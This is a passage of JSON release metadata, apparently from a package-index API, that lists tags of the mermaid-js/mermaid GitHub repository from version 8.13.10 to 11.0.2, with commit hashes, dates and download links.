11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"depende